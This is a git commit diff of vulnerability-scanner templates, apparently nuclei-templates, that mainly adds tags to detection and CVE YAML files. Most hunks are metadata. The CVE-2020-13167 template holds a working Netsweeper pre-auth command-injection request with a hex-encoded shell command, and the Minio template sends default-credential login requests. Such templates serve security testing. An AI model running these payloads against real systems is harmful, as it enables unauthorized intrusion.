Coverage for all templates using tags

2021-09-09 19:08:13 +05:30 · 2021-09-09 19:08:13 +05:30 · bd24dc198e
parent 576499034d
commit bd24dc198e
62 changed files with 124 additions and 20 deletions
--- a/cves/2020/CVE-2020-12800.yaml
+++ b/cves/2020/CVE-2020-12800.yaml
@ -6,6 +6,7 @@ info:
  severity: critical
  description: The drag-and-drop-multiple-file-upload-contact-form-7 plugin before 1.3.3.3 for WordPress allows Unrestricted File Upload and remote code execution by setting supported_type to php% and uploading a .php% file.
  reference: https://github.com/amartinsec/CVE-2020-12800
  tags: cve,cve2020,wordpress,wp-plugin
 requests:
  - raw:
--- a/cves/2020/CVE-2020-13167.yaml
+++ b/cves/2020/CVE-2020-13167.yaml
@ -9,13 +9,15 @@ info:
  reference:
    - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
    - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
  additional-fields:
    hex-payload: 'echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out'
 requests:
  - method: GET
    path:
        # Hex payload: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out
      - "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5"
      - "{{BaseURL}}/webadmin/out"
    headers:
      Referer: "{{BaseURL}}/webadmin/admin/service_manager_data.php"
--- a/cves/2021/CVE-2021-3377.yaml
+++ b/cves/2021/CVE-2021-3377.yaml
@ -8,6 +8,7 @@ info:
    - https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27
  author: geeknik
  severity: medium
  tags: cve,cve2021,xss,npm
 requests:
  - raw:
--- a/default-logins/minio/minio-default-password.yaml
+++ b/default-logins/minio/minio-default-password.yaml
@ -4,23 +4,27 @@ info:
  name: Minio Default Password
  author: pikpikcu
  severity: medium
  tags: default-login,minio
 requests:
  - method: POST
    path:
      - "{{BaseURL}}/minio/webrpc"
    headers:
      Content-Type: application/json
-    body: |
+
-      {"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"}
+    body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"}'
  - method: POST
    path:
      - "{{BaseURL}}/minio/webrpc"
    headers:
      Content-Type: application/json
-    body: |
+
-      {"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"web.Login"}
+    body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"web.Login"}'
    matchers-condition: and
    matchers:
--- a/exposed-panels/prometheus-exposed-panel.yaml
+++ b/exposed-panels/prometheus-exposed-panel.yaml
@ -1,9 +1,11 @@
 id: prometheus-exposed-panel
 info:
  name: Prometheus.io exposed panel
  author: organiccrap
  severity: low
-  # usually runs on port http/9090
+  tags: panel,prometheus
 requests:
  - method: GET
    path:
@ -12,4 +14,4 @@ requests:
    matchers:
      - type: word
        words:
-          - <title>Prometheus Time Series Collection and Processing Server</title>
+          - '<title>Prometheus Time Series Collection and Processing Server</title>'
--- a/exposures/configs/yii-debugger.yaml
+++ b/exposures/configs/yii-debugger.yaml
@ -4,7 +4,8 @@ info:
  name: View Yii Debugger Information
  author: geeknik
  reference: https://yii2-framework.readthedocs.io/en/stable/guide/tool-debugger/
-  severity: info
+  severity: low
  tags: yii,debug,exposure
 requests:
  - method: GET
@ -16,11 +17,14 @@ requests:
      - "{{BaseURL}}/sapi/debug/default/view"
    redirects: true
    max-redirects: 2
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "<title>Yii Debugger</title>"
--- a/exposures/tokens/generic/shoppable-token.yaml
+++ b/exposures/tokens/generic/shoppable-token.yaml
@ -5,6 +5,7 @@ info:
  author: philippedelteil
  severity: info
  reference: https://ask.shoppable.com/knowledge/quick-start-api-guide
  tags: exposure,shoppable,token
 requests:
  - method: GET
--- a/misconfiguration/front-page-misconfig.yaml
+++ b/misconfiguration/front-page-misconfig.yaml
@ -5,6 +5,7 @@ info:
  author: JTeles,pikpikcu
  severity: info
  reference: https://docs.microsoft.com/en-us/archive/blogs/fabdulwahab/security-protecting-sharepoint-server-applications
  tags: misconfig,exposure,frontpage
 requests:
  - method: GET
--- a/technologies/artica-web-proxy-detect.yaml
+++ b/technologies/artica-web-proxy-detect.yaml
@ -1,18 +1,22 @@
 id: artica-web-proxy-detect
 info:
  name: Artica Web Proxy Detect
  author: dwisiswant0
  severity: info
  tags: tech,artica,proxy
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/fw.login.php"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Welcome to the Artica Web Administration Interface"
      - type: status
        status:
          - 200
--- a/technologies/basic-auth-detection.yaml
+++ b/technologies/basic-auth-detection.yaml
@ -4,6 +4,7 @@ info:
  name: Basic auth detection
  author: w4cky_
  severity: info
  tags: tech,basic-auth
 requests:
  - method: GET
--- a/technologies/bigip-config-utility-detect.yaml
+++ b/technologies/bigip-config-utility-detect.yaml
@ -4,6 +4,7 @@ info:
  name: BIG-IP Configuration Utility detected
  author: dwisiswant0
  severity: info
  tags: tech,bigip
 requests:
  - method: GET
--- a/technologies/burp-api-detect.yaml
+++ b/technologies/burp-api-detect.yaml
@ -5,6 +5,7 @@ info:
  author: joanbono
  severity: info
  reference: https://portswigger.net/burp/documentation/enterprise/api-reference
  tags: burp,tech
 requests:
  - method: GET
--- a/technologies/cacti-detect.yaml
+++ b/technologies/cacti-detect.yaml
@ -4,6 +4,7 @@ info:
  author: geeknik
  description: Cacti is a complete network graphing solution -- https://www.cacti.net/
  severity: info
  tags: tech,cacti
 requests:
  - method: GET
--- a/technologies/clockwork-php-page.yaml
+++ b/technologies/clockwork-php-page.yaml
@ -1,9 +1,11 @@
 id: clockwork-php-page
 info:
  name: Clockwork PHP page exposure
  author: organiccrap
  severity: high
  reference: https://twitter.com/damian_89_/status/1250721398747791360
  tags: tech,clockwork
 requests:
  - method: GET
--- a/technologies/cockpit-detect.yaml
+++ b/technologies/cockpit-detect.yaml
@ -4,6 +4,7 @@ info:
  name: Detect Agentejo Cockpit
  author: dwisiswant0
  severity: info
  tags: tech,cockpit
 requests:
  - method: GET
--- a/technologies/dell/dell-idrac6-detect.yaml
+++ b/technologies/dell/dell-idrac6-detect.yaml
@ -1,9 +1,11 @@
 id: dell-idrac6-detect
 info:
  name: Detect Dell iDRAC6
  author: kophjager007
  description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
  severity: info
  tags: tech,dell
 requests:
  - method: GET
--- a/technologies/dell/dell-idrac7-detect.yaml
+++ b/technologies/dell/dell-idrac7-detect.yaml
@ -1,9 +1,11 @@
 id: dell-idrac7-detect
 info:
  name: Detect Dell iDRAC7
  author: kophjager007
  description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
  severity: info
  tags: tech,dell
 requests:
  - method: GET
--- a/technologies/dell/dell-idrac8-detect.yaml
+++ b/technologies/dell/dell-idrac8-detect.yaml
@ -1,9 +1,11 @@
 id: dell-idrac8-detect
 info:
  name: Detect Dell iDRAC8
  author: kophjager007
  description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
  severity: info
  tags: tech,dell
 requests:
  - method: GET
--- a/technologies/dell/dell-idrac9-detect.yaml
+++ b/technologies/dell/dell-idrac9-detect.yaml
@ -1,9 +1,11 @@
 id: dell-idrac9-detect
 info:
  name: Detect Dell iDRAC9
  author: kophjager007
  description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
  severity: info
  tags: tech,dell
 requests:
  - method: GET
--- a/technologies/favicon-detection.yaml
+++ b/technologies/favicon-detection.yaml
@ -10,6 +10,7 @@ info:
    - https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139
    - https://github.com/devanshbatham/FavFreak
    - https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv
  tags: tech,favicon
 requests:
  - method: GET
--- a/technologies/firebase-detect.yaml
+++ b/technologies/firebase-detect.yaml
@ -5,11 +5,13 @@ info:
  author: organiccrap
  severity: low
  reference: http://ghostlulz.com/google-exposed-firebase-database/
  tags: tech,firebase
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/.settings/rules.json?auth=FIREBASE_SECRET"
    matchers:
      - type: word
        words:
--- a/technologies/google-storage.yaml
+++ b/technologies/google-storage.yaml
@ -4,6 +4,7 @@ info:
  name: Google Bucket detection
  author: 0xTeles
  severity: info
  tags: tech,gstorage,google,bucket
 requests:
  - method: GET
--- a/technologies/graphql-detect.yaml
+++ b/technologies/graphql-detect.yaml
@ -4,6 +4,7 @@ info:
  name: GraphQL API Detection
  author: NkxxkN,ELSFA7110
  severity: info
  tags: tech,graphql
 requests:
  - method: POST
--- a/technologies/graylog-api-browser.yaml
+++ b/technologies/graylog-api-browser.yaml
@ -4,6 +4,7 @@ info:
  name: Detect Graylog REST API
  author: PR3R00T
  severity: info
  tags: tech,graylog
 requests:
  - method: GET
--- a/technologies/gunicorn-detect.yaml
+++ b/technologies/gunicorn-detect.yaml
@ -1,9 +1,11 @@
 id: gunicorn-detect
 info:
  name: Detect Gunicorn Server
  author: joanbono
  description: Gunicorn Python WSGI HTTP Server for UNIX - https://github.com/benoitc/gunicorn
  severity: info
  tags: tech,gunicorn
 requests:
  - method: GET
@ -22,4 +24,4 @@ requests:
      - type: kval
        part: header
        kval:
-          - Server
+          - Server
--- a/technologies/harbor-detect.yaml
+++ b/technologies/harbor-detect.yaml
@ -1,8 +1,10 @@
 id: harbor-detect
 info:
  name: Harbor Detect
  author: pikpikcu
  severity: info
  tags: tech,harbor
 requests:
  - method: GET
--- a/technologies/home-assistant.yaml
+++ b/technologies/home-assistant.yaml
@ -4,6 +4,7 @@ info:
  name: Detect Home Assistant
  author: fabaff
  severity: info
  tags: tech,iot
 requests:
  - method: GET
--- a/technologies/ilo-detect.yaml
+++ b/technologies/ilo-detect.yaml
@ -5,6 +5,7 @@ info:
  author: milo2012
  severity: info
  description: Version of HP iLO
  tags: tech,ilo
 requests:
  - method: GET
--- a/technologies/jaspersoft-detect.yaml
+++ b/technologies/jaspersoft-detect.yaml
@ -4,6 +4,7 @@ info:
  name: Jaspersoft detected
  author: koti2
  severity: info
  tags: tech,jaspersoft
 requests:
  - method: GET
--- a/technologies/jellyfin-detect.yaml
+++ b/technologies/jellyfin-detect.yaml
@ -4,6 +4,7 @@ info:
  name: Jellyfin detected
  author: dwisiswant0
  severity: info
  tags: tech,jellyfin
 requests:
  - method: GET
@ -13,6 +14,8 @@ requests:
      - "{{BaseURL}}/index.html"
      - "{{BaseURL}}/web/index.html"
      - "{{BaseURL}}/web/manifest.json"
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
@ -22,6 +25,7 @@ requests:
          - "The Free Software Media System"
        condition: or
        part: body
      - type: status
        status:
          - 200
--- a/technologies/jolokia.yaml
+++ b/technologies/jolokia.yaml
@ -4,11 +4,13 @@ info:
  name: Jolokia Version Disclosure
  author: mavericknerd,dwisiswant0
  severity: info
  tags: tech,jolokia
 requests:
  - method: GET
    path:
      - '{{BaseURL}}/jolokia/version'
    matchers-condition: and
    matchers:
      - type: word
@ -17,6 +19,7 @@ requests:
          - '"protocol":'
          - '"agent":'
        condition: and
      - type: status
        status:
          - 200
--- a/technologies/kibana-detect.yaml
+++ b/technologies/kibana-detect.yaml
@ -4,6 +4,7 @@ info:
  name: Kibana Service Detection
  author: petruknisme
  severity: info
  tags: tech,kibana
 requests:
  - method: GET
--- a/technologies/kong-detect.yaml
+++ b/technologies/kong-detect.yaml
@ -4,6 +4,7 @@ info:
  author: geeknik
  description: The Cloud-Native API Gateway - https://github.com/Kong/kong
  severity: info
  tags: tech,kong
 requests:
  - method: GET
--- a/technologies/liferay-portal-detect.yaml
+++ b/technologies/liferay-portal-detect.yaml
@ -1,9 +1,11 @@
 id: liferay-portal-detect
 info:
  name: Liferay Portal Detection
  author: organiccrap,dwisiswant0
  severity: info
  reference: https://github.com/mzer0one/CVE-2020-7961-POC # CVE-2020-7961: Liferay Portal Unauthenticated RCE
  tags: tech,liferay
 requests:
  - method: GET
--- a/technologies/linkerd-badrule-detect.yaml
+++ b/technologies/linkerd-badrule-detect.yaml
@ -1,15 +1,11 @@
 id: linkerd-badrule-detect
 # Detect the Linkerd service by overriding the delegation table with an invalid
 # rule, the presence of the service is indicated by either:
 #   - a "Via: .. linkerd .."
 #   - a "l5d-err" and/or a "l5d-success" header
 #   - a literal error in the body
 info:
  name: Linkerd detection via bad rule
  author: dudez
  severity: info
  tags: tech,linkerd
  reference: https://linkerd.io
 requests:
  - method: GET
--- a/technologies/lotus-domino-version.yaml
+++ b/technologies/lotus-domino-version.yaml
@ -1,8 +1,10 @@
 id: lotus-domino-version
 info:
  name: Lotus Domino Version Extractor
  author: CasperGN
  severity: info
  tags: tech,lotus
 requests:
  - method: GET
    path:
--- a/technologies/metabase-detect.yaml
+++ b/technologies/metabase-detect.yaml
@ -1,13 +1,17 @@
 id: metabase-version-detect
 info:
  name: Detect Metabase Version
  author: revblock
  description: If a Metabase instance is deployed on the target URL it will return a login page with the version number in the page source
  severity: info
  tags: tech,metabase
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/auth/login"
    matchers-condition: and
    matchers:
--- a/technologies/mrtg-detect.yaml
+++ b/technologies/mrtg-detect.yaml
@ -1,9 +1,11 @@
 id: mrtg-detect
 info:
  name: Detect MRTG
  author: geeknik
  description: The Multi Router Traffic Grapher -- https://oss.oetiker.ch/mrtg/
  severity: info
  tags: tech,mrtg
 requests:
  - method: GET
--- a/technologies/netsweeper-webadmin-detect.yaml
+++ b/technologies/netsweeper-webadmin-detect.yaml
@ -4,6 +4,7 @@ info:
  name: Netsweeper WebAdmin detected
  author: dwisiswant0
  severity: info
  tags: tech,netsweeper
 requests:
  - method: GET
--- a/technologies/nginx-version.yaml
+++ b/technologies/nginx-version.yaml
@ -1,9 +1,12 @@
 id: nginx-version
 info:
  name: nginx version detect
  author: philippedelteil
  description: Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.
  severity: info
  tags: tech,nginx
 requests:
  - method: GET
    path:
--- a/technologies/nifi-detech.yaml
+++ b/technologies/nifi-detech.yaml
@ -4,6 +4,7 @@ info:
  name: Apache NiFi detect
  author: dwisiswant0
  severity: info
  tags: tech,apache,nifi
 requests:
  - method: GET
@ -15,6 +16,7 @@ requests:
      - "{{BaseURL}}/flow/registries"
      - "{{BaseURL}}/system-diagnostics"
      - "{{BaseURL}}/nifi-api/access/config"
    matchers-condition: and
    matchers:
      - type: regex
@ -22,6 +24,7 @@ requests:
          - "supportsLogin"
          - "disconnectedNodeAcknowledged"
          - "(aggregate|node)Snapshots?"
      - type: status
        status:
          - 200
--- a/technologies/oidc-detect.yaml
+++ b/technologies/oidc-detect.yaml
@ -1,9 +1,11 @@
 id: oidc-detect
 info:
  name: Detect OpenID Connect provider
  author: jarijaas
  severity: info
  description: Detects OpenID Connect providers. See https://en.wikipedia.org/wiki/OpenID_Connect
  tags: tech,oidc
 requests:
  - method: GET
--- a/technologies/openam-detection.yaml
+++ b/technologies/openam-detection.yaml
@ -4,6 +4,7 @@ info:
  name: Detect OpenAM and OpenSSO
  author: philippedelteil
  severity: info
  tags: tech,openam
 requests:
  - method: GET
--- a/technologies/pi-hole-detect.yaml
+++ b/technologies/pi-hole-detect.yaml
@ -1,8 +1,10 @@
 id: pi-hole-detect
 info:
  name: pi-hole detector
  author: geeknik
  severity: info
  tags: tech,pihole
 requests:
  - method: GET
@ -14,6 +16,7 @@ requests:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "Pi-hole"
--- a/technologies/prtg-detect.yaml
+++ b/technologies/prtg-detect.yaml
@ -1,9 +1,11 @@
 id: prtg-detect
 info:
  name: Detect PRTG
  author: geeknik
  description: Monitor all the systems, devices, traffic, and applications in your IT infrastructure -- https://www.paessler.com/prtg
  severity: info
  tags: tech,prtg
 requests:
  - method: GET
--- a/technologies/redmine-cli-detect.yaml
+++ b/technologies/redmine-cli-detect.yaml
@ -4,6 +4,7 @@ info:
  author: geeknik
  description: A small command-line utility to interact with Redmine - https://pypi.org/project/Redmine-CLI/
  severity: info
  tags: tech,redmine
 requests:
  - method: GET
--- a/technologies/s3-detect.yaml
+++ b/technologies/s3-detect.yaml
@ -4,6 +4,7 @@ info:
  name: Detect Amazon-S3 Bucket
  author: melbadry9
  severity: info
  tags: aws,s3,bucket,tech
 requests:
  - method: GET
--- a/technologies/shiro-detect.yaml
+++ b/technologies/shiro-detect.yaml
@ -1,16 +1,20 @@
 id: shiro-detect
 info:
  name: Detect Shiro Framework
  author: AresX
  severity: info
  tags: tech,shiro
 requests:
  - method: GET
    path:
      - '{{BaseURL}}'
    headers:
      Cookie: rememberMe=123;
    matchers:
      - type: word
        words:
-          - rememberMe=deleteMe
+          - 'rememberMe=deleteMe'
        part: header
--- a/technologies/springboot-actuator.yaml
+++ b/technologies/springboot-actuator.yaml
@ -4,13 +4,17 @@ info:
  name: Detect Springboot Actuators
  author: that_juan_,dwisiswant0,wdahlenb
  severity: info
  tags: tech,springboot,actuator
 requests:
  - method: GET
    path:
      - "{{BaseURL}}"
      - "{{BaseURL}}/actuator"
      - "{{BaseURL}}/favicon.ico"
      - "{{BaseURL}}/actuator/favicon.ico"
    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: word
--- a/technologies/sql-server-reporting.yaml
+++ b/technologies/sql-server-reporting.yaml
@ -4,6 +4,7 @@ info:
  name: Detect Microsoft SQL Server Reporting
  author: puzzlepeaches
  severity: info
  tags: tech,micrsoft
 requests:
  - method: GET
--- a/technologies/telerik-fileupload-detect.yaml
+++ b/technologies/telerik-fileupload-detect.yaml
@ -4,11 +4,13 @@ info:
  name: Detect Telerik Web UI fileupload handler
  author: organiccrap
  severity: info
  tags: tech,telerik
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/Telerik.Web.UI.WebResource.axd?type=rau"
    matchers:
      - type: word
        words:
--- a/technologies/terraform-detect.yaml
+++ b/technologies/terraform-detect.yaml
@ -1,9 +1,11 @@
 id: terraform-detect
 info:
  name: Detect Terraform Provider
  author: geeknik
  description: Write Infrastructure as Code - https://www.terraform.io/
  severity: info
  tags: tech,terraform
 requests:
  - method: GET
--- a/technologies/tomcat-detect.yaml
+++ b/technologies/tomcat-detect.yaml
@ -1,10 +1,12 @@
-id: tomcat-version-detect
+id: tomcat-version
 info:
  name: Detect Tomcat Version
  author: philippedelteil
-  description: If an Tomcat instance is deployed on the target URL, when we send a request for
+  description: If an Tomcat instance is deployed on the target URL, when we send a request for a non existent resource we receive a Tomcat error page with version.
    a non existent resource we receive a Tomcat error page with version.
  severity: info
  tags: tech,tomcat,apache
 requests:
  - method: GET
    path:
--- a/technologies/tor-socks-proxy.yaml
+++ b/technologies/tor-socks-proxy.yaml
@ -1,8 +1,10 @@
 id: tor-socks-proxy
 info:
  name: Detect tor SOCKS proxy
  author: geeknik
  severity: info
  tags: tech,tor,proxy
 requests:
  - method: GET
--- a/technologies/weblogic-detect.yaml
+++ b/technologies/weblogic-detect.yaml
@ -4,6 +4,7 @@ info:
  name: Detect Weblogic
  author: bing0o
  severity: info
  tags: tech,weblogic
 requests:
  - method: GET
--- a/technologies/werkzeug-debugger-detect.yaml
+++ b/technologies/werkzeug-debugger-detect.yaml
@ -4,6 +4,7 @@ info:
  name: Werkzeug debugger console
  author: pdteam
  severity: info
  tags: tech,werkzeug
 requests:
  - method: GET
--- a/vulnerabilities/lsoft/listserv_maestro_rce.yaml
+++ b/vulnerabilities/lsoft/listserv_maestro_rce.yaml
@ -8,6 +8,7 @@ info:
  reference:
    - https://www.securifera.com/advisories/sec-2020-0001/
    - https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt
  tags: rce,listserv,ognl
 requests:
  - method: GET
--- a/vulnerabilities/other/cacti-weathermap-file-write.yaml
+++ b/vulnerabilities/other/cacti-weathermap-file-write.yaml
@ -5,6 +5,7 @@ info:
  author: pikpikcu
  severity: medium
  reference: https://www.freebuf.com/articles/system/125177.html
  tags: injection,cacti
 requests:
  - method: GET
--- a/vulnerabilities/other/caucho-resin-info-disclosure.yaml
+++ b/vulnerabilities/other/caucho-resin-info-disclosure.yaml
@ -5,6 +5,7 @@ info:
  author: pikpikcu
  severity: info
  reference: https://www.exploit-db.com/exploits/27888
  tags: exposure,resin
 requests:
  - method: GET
--- a/vulnerabilities/other/pmb-local-file-disclosure.yaml
+++ b/vulnerabilities/other/pmb-local-file-disclosure.yaml
@ -5,6 +5,7 @@ info:
  author: dhiyaneshDk
  severity: high
  reference: https://www.exploit-db.com/exploits/49054
  tags: lfi,pmb
 requests:
  - method: GET
--- a/vulnerabilities/other/vpms-auth-bypass.yaml
+++ b/vulnerabilities/other/vpms-auth-bypass.yaml
@ -5,7 +5,7 @@ info:
  author: dwisiswant0
  severity: high
  reference: https://www.exploit-db.com/exploits/48877
-
+  tags: auth-bypass
 requests:
  - raw:
      - |
--- a/vulnerabilities/other/zms-auth-bypass.yaml
+++ b/vulnerabilities/other/zms-auth-bypass.yaml
@ -5,6 +5,7 @@ info:
  author: dwisiswant0
  severity: high
  reference: https://www.exploit-db.com/exploits/48880
  tags: auth-bypass,zms
 requests:
  - raw: